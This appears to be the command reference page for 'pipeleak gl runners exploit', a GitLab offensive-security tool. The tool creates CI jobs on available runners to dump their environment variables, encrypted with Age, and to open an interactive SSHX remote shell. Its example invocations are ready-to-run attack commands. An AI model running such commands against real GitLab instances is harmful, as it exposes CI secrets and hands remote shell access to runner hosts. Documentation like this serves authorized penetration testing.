Exploit

pipeleak gl runners exploit

Create project with CI/CD jobs to exploit available runners

Synopsis

Creates a project, generates a job per available runner tag and runs a default .gitlab-Ci.yml definition which can be customized for exploitation.

pipeleak gl runners exploit [flags]

Examples

# Creates a project with jobs for all available runners with the tags docker, shared. Dumps the envs encrypted using Age and starts an interactive SSHX shell,      
pipeleak gl runners exploit --token glpat-xxxxxxxxxxx --gitlab https://gitlab.mydomain.com --tags docker,shared --agePublicKey age1... --repoName my-exploit-repo --dry=false --shell=true

# Print the generated .gitlab-ci.yml only, does NOT create a project or jobs
pipeleak gl runners exploit --token glpat-xxxxxxxxxxx --gitlab https://gitlab.mydomain.com --dry=true --shell=true

Options

      --agePublicKey string   An age public key generated with ./age-keygen -o key.txt (repo: https://github.com/FiloSottile/age). Prints the encrypted environment variables in the output log.
  -d, --dry                   Only genereate and print the .gitlab-ci.yml, do NOT create real jobs
  -h, --help                  help for exploit
      --repoName string       The name for the created repository (default "pipeleak-runner-test")
  -s, --shell                 Add an SSHX interactive shell to the jobs (default true)
      --tags strings          Jobs with the following tags are created

Options inherited from parent commands

      --coloredLog       Output the human-readable log in color (default true)
  -g, --gitlab string    GitLab instance URL
      --json             Use JSON as log output format
  -l, --logfile string   Log output to a file
  -t, --token string     GitLab API Token
  -v, --verbose          Verbose logging

SEE ALSO

• pipeleak gl runners - runner related commands